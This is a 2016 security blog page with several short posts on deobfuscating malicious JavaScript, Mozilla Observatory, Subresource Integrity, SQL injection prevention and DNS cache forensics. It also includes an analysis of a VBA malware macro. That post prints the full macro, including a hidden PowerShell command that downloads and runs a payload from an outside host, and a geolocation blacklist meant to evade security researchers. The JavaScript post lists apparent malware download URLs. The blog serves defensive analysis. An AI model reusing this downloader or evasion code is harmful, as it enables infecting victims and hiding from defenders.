Wednesday, August 31, 2016

Deobfuscating some more Javascript

Saw this paste with malicious javascript. If ou strip out all the malicious variable creations (_zds, se, _dd) and the eval statement at the end , and replace them all with console.log() statements, you can get a bit of a better picture. Then if you do the same routine again of repacing bad stuff with console.log statemnts you finally get this code

and in it there is a freeky looking variable that ends up containing the urls of interest.

var IGv7=[MMo+XQb1+Gd5 + VSv+Hb+Cl+Tj4+VKq+Pg + DSx+Pa + GYy+MEw1+Rj + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ow9 + ORq+Sv+FOl7 + Cn, MMo+Ly5+YOv7 + AYc8+Sq6+So+Af1+Nu + Zz+ZKb + Zn1+Ik+Vy4+PRi5+Ho4+Gy9, VBg+DFu + ZDn + Cl0+Vw+Jc + Fs+Jp + Tu6+Vg7+OZv8 + UTt+Po+Cj3 + Gq8+EDt+Ag+LDc + Qn+St0+HNu + Sk6, MMo+Ly5+Qc7 + Vc9+Zn4 + ALt+Ui4 + BYt+Cc5+ZZq9 + Vm0+Ci5, Wq6 + Ya+Li5 + LJz3+Vg+Je1 + Yu8+ZPg+DFe5+HDm+Su1+Xz + XGx];

when printed out

console.log(IGv7);

["http://jago-computerservice.homepage.t-online.de/poxs17b", "http://www.elba-scaglieri.com/vj021d23", "http://sven-jaenecke.homepage.t-online.de/zvs7h", "http://www.arrotin.net/y263j", "http://bookinghotworld.ws/0b8acb"]



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels:

Run this Free Scan on your Website

Mozilla came out with a great free online tool called the Mozilla Observatory which gives you another great way to get a gauge as to how secure your developers and sysadmin are setting up your website. It's a simple A to F grade scale again, and of course like every other tool it's not perfect, but if you have a dynamically generated site that pulls records from a database for example, you really want to consider having your team modify your website code to get the score of an A.



It tells you about many great features, mostly HTTP Header related, that you should be doing on your site but may not be. It has the little informational icon which will give you details about how to resolve your issues also.



It also tells you about your SSL configuration (Qualys SSL LAbs is also a good tool for this)

Overall it's good to get 3rd party perspectives on the security of your site.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , , , ,

Web Developers Add this to your Script Tags

Troy Hunt wrote a great article on Web Subresource Integrity (SRI). As an example notice this script tag, where you're pulling the jquery library from a CDN so that you don't have to host it yourself, and to gain the browser caching performance benefits since the user probably already has it cached anyways.

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.3/jquery.min.js" integrity="sha384-I6F5OKECLVtK/BL+8iSLDEHowSAfUo76ZL9+kGAgTRdiByINKJaqTPH/QVNS1VDb" crossorigin="anonymous"></script>

Notice the extra fields in red that you may not normally be used to adding/seeing. If you're a web developer you really want to consider adding these. Why?

The integrity attribute means that when the browser loads jQuery from CloudFlare it's going to calculate the hash of the file (a base64-encoded SHA384 hash in this case per the prefix in the attribute), compare it to the one described on the script tag and then only run it if it checks out. Thus if the CDN has been hacked or somehow your browser is getting a Man-in-the-middled modified version of the file, if the hashes don't match, it won't run it.

The crossorigin attribute is set to anonymous to ensure no creds or identity info is sent with the request (i.e. basic auth or an auth cookie)

Good simple stuff to add and increase the security on your site.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , , ,

Prevent SQL Injection in PHP

Good quick read on preventing SQL injection by Kamran Mohsin

1-Input Validation
  e.g. convert integers to integers before using so no nasty sql code can be added.
   $id = intval($_GET['id']);

2-Prepared Statements
  e.g. a better way , it separates sql logic from the data
  $stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (:name, :value)");
  $stmt->bindParam(':name', $name);
  $stmt->bindParam(':value', $value);

3-Least Privileges
e.g. even if your developer screwed up, limit what the bad guy can do. if the website only reads certain tables, only give it read access to those tables.


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , ,

ipconfig /displaydns

Thought it'd be useful to share how to use the built-in windows ipconfig /displaydns command for forensics or security research. This gives you a list of all dns entries cached locally by your workstation so you can see where you, or your malware you're researching has been trying to call out for.



And of course by combining commands you can quickly narrow down the results such as with findstr



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , ,

VBA Malware with Security Researcher Detection

I saw this paste titled deobfuscated malware on pastebin a few days ago. Thought it was worth discussing. This is a malicious vba script (which launches powershell) that is going to download and execute a payload on the victims computer.

.DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

What's interesting or a bit different about this payload than others is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMWare Detection in order to disable itself if it's being run in a virtual machine, this malware is disabling itself if it's being run from within a security research coproration ip subnet. How? The attacker is actually pulling your geo location from maxmind.com

  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False



and the attacker has a blacklist

  Blacklist = Array( 'Return
   "FORTINET", _
...
   "TREND MICRO", _
...
   "FIREEYE", _

and if for example it contained the text FIREEYE (a leading security research company)



then the malware would disable itself.

  If BlacklistHit Then Error 102

So security researchers should be aware of code/attacks like this that may purposefully do nothing depending on how or where you run it from.

Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.

The code

Dim gContinue As Boolean
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
  On Error GoTo x_Error
  If gContinue Then Exit Sub
   gContinue = True
   ExecutePayload
  Exit Sub
  x_Error:
End Sub

Public Sub ExecutePayload()
  If RecentFileCountTooLow Then Error 101
  If BlacklistHit Then Error 102
  Set WScriptShell = CreateObject("WScript.Shell")
  WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)", 0
  Exit Sub
End Sub

Public Function RecentFileCountTooLow() As Boolean
  RecentFileCountTooLow = RecentFiles.Count < 3
End Function

Dim City As String
Public Function BlacklistHit() As Boolean
  City = UCase(GetCity)
  For Each Value In Blacklist
   If InStr(City, Value) <> 0 Then GoTo InBlacklist
  Next
  Exit Function
  InBlacklist:
   BlacklistHit = True 'Return
End Function

Public Function Blacklist()
  Blacklist = Array( 'Return
   "FORTINET", _
   "CISCO", _
   "TREND MICRO", _
   "RACKSPACE", _
   "HOSTING", _
   "STRONG TECHNOLOGIES", _
   "DATA CENTER", _
   "IRON PORT", _
   "BLUECOAT", _
   "BLUE COAT", _
   "VMVAULT", _
   "MESSAGELABS", _
   "MICROSOFT", _
   "MIMECAST", _
   "LEASEWEB", _
   "BLACKOAKCOMPUTERS", _
   "ESET, SPOL", _
   "SERVER", _
   "DATACENTER", _
   "BITDEFENDER", _
   "DATACENTRE", _
   "OVH SAS", _
   "NFORCE", _
   "TRENDMICRO", _
   "ANONYMOUS", _
   "CLOUD", _
   "AMAZON", _
   "HISPEED.CH", _
   "HOSTED", _
   "IRONPORT", _
   "PALO ALTO", _
   "PROOFPOINT", _
   "SECURITY", _
   "TRUSTWAVE", _
   "FORCEPOINT", _
   "DEDICATED", _
   "HETZNER", _
   "FIREEYE", _
   "ZSCALER"
  )
End Function

Public Function GetCity() As String
  Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
  xmlHttp.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
  xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
  xmlHttp.Send
  If xmlHttp.Status <> 200 Then Error 201
   GetCity = xmlHttp.ResponseText 'Return
End Function

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , , , ,

.xyz and .top domain names

It struck me that on many of the SANS ISC diaries [1] and the Malware Traffic Analysis blog posts [1] that many if not the majority of the malware analyzed was reaching out to .xyz or .top domain names. It appears they can go for less than $1/yr which may be a contributing factor to why they're so popular with the bad guys. Head over to tld-list.com and sort by “Cheapest Register.” It may not be correct to block them all, but in the current state of things it seems reasonable to possibly alert on or look at all emails and/or web traffic to these top level domains?

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)